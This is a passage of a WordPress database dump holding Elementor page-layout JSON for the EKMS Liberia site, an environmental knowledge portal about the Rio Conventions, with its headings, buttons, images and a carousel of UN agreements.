bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(16928,2534,'_elementor_version','2.7.5'),(16929,2534,'_elementor_template_type','wp-page'),(16930,2534,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(16939,2536,'_wp_page_template','default'),(16940,2536,'_elementor_edit_mode','builder'),(16941,2536,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"],\"limit_query\":10,\"post_content_length\":20},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa 